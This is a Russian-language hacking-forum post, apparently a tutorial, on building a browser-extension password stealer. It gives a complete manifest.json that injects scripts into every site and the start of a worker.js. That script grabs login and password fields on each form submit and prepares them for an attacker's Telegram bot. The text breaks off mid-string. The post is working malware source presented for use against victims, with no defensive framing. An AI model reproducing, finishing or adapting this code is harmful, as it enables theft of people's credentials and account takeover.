- Регистрация
- 31.12.2019
- Сообщения
- 7,535
- Реакции
- 36
Привет, хацкер, сегодня мы напишем стиллер/логгер на JavaSript с отправкой логов в телегу.
Итак, стиллер работает таким образом:
- Жертва устанавливает расширение в браузер, затем при попытке входа на сайт (данный стиллер поддерживает большинство сайтов) к злоумышленнику (нам) отправляются данные из поля для ввода. Всё просто.
Coding Time!
Создадим manifest.json в котором будет содержаться имя, описание, версия скрипта:
Код:
{ "manifest_version": 2, "name": "IceRed D$", // Имя скрипта "version": "0.1", // Версия "description": "Example ChromeExtension", // Описание "content_scripts": [ { "matches": [ "<all_urls>" ], // Указываем, что расширение должно работать со всеми url "js": [ "jquery.js" , "worker.js" ], // Добавляем источники кода "run_at": "document_end" } ] }
P.S Если вы хотите установить фильтр для конкретных сайтов, то вместо <all_urls> вписываете домен сайта(ов)
Следующим шагом нам нужно скачать jquery.js и добавить в папку с нашим расширением.
Теперь нам нужно создать worker.js в котором у нас происходит получение значений из полей для ввода, а после отправка лога в телеграм бот.
Код:
var token = 'XXX'; // ВАШ токен тут (замени XXX) var api = 'https://api.telegram.org/bot' + token; // Переменная для запроса к API с токеном бота var UID = 'XXX'; // Ваш ID тут (замени XXX) $("form").submit(function() { var login = $(this).parent().find('input[type=text]').val(); // Получаем логин, из поля с типом text var pass = $(this).parent().find('input[type=password]').val(); // Получаем пароль, из поля с типом password var currentSite = document.domain; // Получаем домен сайта var message = "<b>NEW LOG